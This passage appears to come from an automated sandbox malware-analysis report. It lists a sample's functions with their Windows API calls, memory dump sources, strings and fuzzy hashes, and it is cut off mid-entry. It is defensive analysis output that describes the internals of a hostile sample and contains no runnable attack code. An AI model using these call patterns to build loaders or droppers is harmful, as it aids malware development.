                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                  • API String ID: 2266616436-4211696005
                                                                                                                                                                                  • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                  • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427DC1,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                  • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1599320355-0
                                                                                                                                                                                  • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                  • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                  Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                  • String ID: Version
                                                                                                                                                                                  • API String ID: 512980652-315105994
                                                                                                                                                                                  • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                  • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                  • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                  • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                  • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                  Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2883127279-0
                                                                                                                                                                                  • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                  • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                  • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                  • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                  Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                  • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                  • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                  • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                  • String ID: !N~
                                                                                                                                                                                  • API String ID: 623250636-529124213
                                                                                                                                                                                  • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                  • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                  Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                  • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                  • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                  • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                  Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                    • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                  • API String ID: 3509786178-2769509956
                                                                                                                                                                                  • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                  • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                  Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                  • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                  • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                  • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0150ED90 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $ji$TJcq$Te^q$pbq$xbaq
                                                                                                                                                                                  • API String ID: 0-1137945258
                                                                                                                                                                                  • Opcode ID: a7c0708024844cc7e0ddadaa0e4324bc82c03343d0d38baee7ddb35a11b4558f
                                                                                                                                                                                  • Instruction ID: 692ef7abd44fe75b6f49c15ca717e5837a5d376f8ee478ff45a2283c81714ce8
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7c0708024844cc7e0ddadaa0e4324bc82c03343d0d38baee7ddb35a11b4558f
                                                                                                                                                                                  • Instruction Fuzzy Hash: BEA2A475A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D509AB365DB319E81CF40
                                                                                                                                                                                  Function 0150ABA3 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                  • Opcode ID: 7b43d9b52ea5350e35bc8738dd7f853ca854349a3f2f89d47f5e695da56cfcd1
                                                                                                                                                                                  • Instruction ID: e1f722e58efe953f0869359a904f273413dd2f9f16ffbbddd6a8fbac598991f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b43d9b52ea5350e35bc8738dd7f853ca854349a3f2f89d47f5e695da56cfcd1
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9710C70E006098FD748EF6AE9946ADBBF3FB98300F14D529D504EB2A9EF7458458B80
                                                                                                                                                                                  Function 0150ABB0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                  • Opcode ID: f0234e04ca6fd8ce4a6ae54764071a5eeec79dd6ebd8b850cf81c8dd6a38e726
                                                                                                                                                                                  • Instruction ID: a43c2b124f7c436d04735862d09c80bbebd0a091a28c1ecf5883c8a57978bdee
                                                                                                                                                                                  • Opcode Fuzzy Hash: f0234e04ca6fd8ce4a6ae54764071a5eeec79dd6ebd8b850cf81c8dd6a38e726
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5971EC70E006098FD748EF6AE9946ADBBF3FB98300F14D529D504EB2A8EF7458458B81
                                                                                                                                                                                  Function 075FE6A0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Deq
                                                                                                                                                                                  • API String ID: 0-948982800
                                                                                                                                                                                  • Opcode ID: 08ff9e2c351186ced821df7c68f3f976853f8fda6a6434bf0a6ae879263bcd48
                                                                                                                                                                                  • Instruction ID: 84973686128121d8bc1282e5b9039c7737d602014dec293ccf3a4a0fb6bcda48
                                                                                                                                                                                  • Opcode Fuzzy Hash: 08ff9e2c351186ced821df7c68f3f976853f8fda6a6434bf0a6ae879263bcd48
                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D1D074A00219CFDB58DFA9D994A9DBBF2FF89300F1080A9D509AB365DB31AD81CF51
                                                                                                                                                                                  Function 01501C90 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Te^q
                                                                                                                                                                                  • API String ID: 0-671973202
                                                                                                                                                                                  • Opcode ID: c27c09efce7bfe9ab6df78fec05acc7c10de9bfaf105660331527dfbc3418eac
                                                                                                                                                                                  • Instruction ID: 9865412270cfb76ab3e5d0fef5fc70f6bd7f535e96f862cc5c187bd0aaeaface
